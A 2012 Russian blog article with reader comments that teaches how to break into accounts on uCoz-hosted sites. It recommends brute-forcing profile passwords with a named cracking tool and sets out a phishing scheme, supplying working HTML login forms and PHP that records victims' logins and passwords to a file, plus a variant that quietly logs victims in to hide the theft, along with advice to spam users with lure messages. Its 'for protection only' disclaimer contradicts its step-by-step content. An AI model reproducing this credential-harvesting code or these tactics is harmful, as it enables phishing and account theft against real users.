Регистрация    Войти
Авторизация

Способы взлома сайта на uCoz

Способы взлома сайта на uCoz

Способы взлома сайта на uCoz. Пару способов взлома сайтов на ucoz.
Есть много способов взломать профиль на ucoz, но я расскажу только о двух самых, как я думаю, реальных и доступных.
1 способ - брут.
Способ легкий, но очень нудный.
Если у вас маленькая скорость интернета, паблик прокси и нет хорошей базы паролей, то взломаете аккаунт вы через лет 10 .

Брутить будем с помощью программы UltimateBruteforce v2 by Z.Razor.
Для начала скачиваем программу
Внимание! У вас нет прав для просмотра скрытого текста.

Запускаем программу, жмем "Загрузить настройки", выбираем настройки forucoz.ubo.
Заменяем диз-кс на другой, интересующий вас сайт uCoz.
Настраиваем базы данных, запускаем брут. Лучше всего ставить на ночь =)
Внимание:
1) Если у сайта, с которого вы хотите брутить, unet пользователи, а не локальные, то вам придется сначала узнать их логин (e-mail). C локальными дело обстоит гораздо проще (логин==ник).
2) Подбирается пароль к профилю, а не к админ-панели.
Смотрим видео по настройке программы:

Если у вас есть какие-то вопросы, спрашивайте в комментариях, я отвечу!
2 способ - фейк.
Очень непой способ, мне он однажды помог :))
Но этот способ для нубов, школоты, новичков ;)
Нам понадобится:
1) любой хостинг с php (или ucoz сайт с подключенной услугой php)
2) свой сайт на ucoz.
3) прямые руки.

а) Способ с хостингом и php (без юкозовского php).
Главное - форма входа, чтобы там был значок unet (который означает, что вход с помощью мыла и пароля), и чтобы юзер поверил, что это юкоз, а не какой-нибудь развод
Можете пойти на любой посещаемый сайт, спамить в ЛС с просьбой о авторизации на вашем ucoz сайте, и поверьте, юзеров 10 и 50 клюнут на эту фишку.
Страница с формой входа должна иметь такой вид:
<html>
<head>
<title>Сайт, тра-та-та</title>
</head>
<body>
<form method="post" action="sub.php">
<input type="text" name="login"/>
<input type="text" name="pass"/>
<input type="submit" value="Войти"/>
</form>
</body>
</html>

Самое главное здесь:
method="post" action="sub.php"
name="login"
name="pass"


Остальное можете изменить, украсить как вам нравится :)
Как вы видите, данные будут поститься в файл sub.php (action="sub.php").
Создаем файл sub.php с содержимым:

<?php

$site = "http://manucoz.ru/"; // сайт, на который будет переходить после авторизации
$login = $_POST['login']; // получаем логин
$pass = $_POST['pass']; // получаем пароль
$file = fopen("hack.txt","a+"); // открываем файл hack.txt, куда будут записываться данные жертв, если файла такого нет, он создается
fwrite($file,"\n $login;$pass"); // записываем данные (логин;пароль)
fclose($file); // закрываем файл hack.txt

echo "<html><head><meta http-equiv='Refresh' content='0;URL={$site}'></head></html>"; // переадресация на $site

?>

Если вам лень создавать, можете скачать эти файлы
Внимание! У вас нет прав для просмотра скрытого текста.
.
Но этот способ палевный, т.к юзер на сайте на авторизуется, а просто обновляется страница.

б) Другое дело с php на uCoz! :)
Содержимое файла sub.php будет примерно таким:

<?php

$login = $_POST['login']; // получаем логин
$pass = $_POST['pass']; // получаем пароль
$file = fopen("hack.txt","a+"); // открываем файл hack.txt, куда будут записываться данные жертв, если файла такого нет, он создается
fwrite($file,"\n $login;$pass"); // записываем данные (логин;пароль)
fclose($file); // закрываем файл hack.txt

?>

А форма входа такой:
// Тут форма входа
<form method="post" action="/" id="loginform">
<input type="text" name="login"/>
<input type="text" name="pass"/>
</form>
// Дальше идет скрипт
<script>
$('button').click(function(){
$.post('/php/sub.php', $('#loginform').serialize(), function(){$.post('/index/sub/', {a: 2, rem: 1, ajax: 2, user: $('input[name="login"]').val(), password: $('input[name="pass"]').val()}, function(){location="$HOME_PAGE_URL$"})});
</script>

Т.е при клике на определенную кнопку (button) будет сначала пост в php файл (пароль с логином сохранятся), потом последует пост в /index/sub/ и юзер на сайте авторизуется.
Код выше неполный(требует доработки) и пока мною не проверялся, т.к нету ucoz сайта с php :)

Прочитав эту статью, не надо бежать и пробовать ломать сайты =)
Эта статья была написана для того, чтобы вас не взломали и не развели как а :D :)
Скачать шаблоны для ucoz

Есть вопросы по шаблону или скрипту? так задай их и мы ответим!

Автор: chestr  10-01-2012, 19:55   Просмотров: 15623   
взлома, uCoz, взлома, способов, сайта, новости, Способы, сайтов, Подробнее, ucoz, полной
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь. Мы рекомендуем Вам зарегистрироваться либо зайти на сайт под своим именем.

Пользователь offline LoL=D 10 января 2012 20:24
Интересно... Но я ничего не понял :D

          1
Пользователь offline vladikill86 10 января 2012 23:32
да ну) понимаю если бы пароль от панели управления вот тогда было пипец как круто )

          2
Пользователь offline qiborg 12 января 2012 14:28
vladikill86, для этого есть бруты, и фейк странички.
LoL=D, по другому это называется фейк страницы сайтов -

          3
Пользователь offline qiborg 12 января 2012 14:36
qiborg,сорри не дописал :D (модеры подправите)
LoL=D,- так вот, эта страница оченб похожа на страницу, по которой заходит юзер на сайт, но эта страница не дает авторизации на сайте, а ворует пароли и отправляет все на почту либо отдельную страницу (указанную в верстке фейка)на домене

          4
Пользователь offline Bilbao 14 января 2012 22:57
В файле есть вирус !!!!!

          5
Пользователь offline flexet 24 января 2012 10:32
кто поможет у меня выдаёт только ошибки и всё

          6
Пользователь offline chestr 20 сентября 2012 14:50
Цитата: Bilbao
В файле есть вирус !!!!!

Можно сказать что любые взломные программы содержат вирус)

          7
Пользователь offline _CrySiS_ 3 ноября 2012 17:39
Способы просто убили

          8
Пользователь offline Trololo 14 декабря 2012 12:11
Помогите плиз со скриптом под буквой "б)"
Пишите в скайп:tima-ic-ykraina

          9

Информация
Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.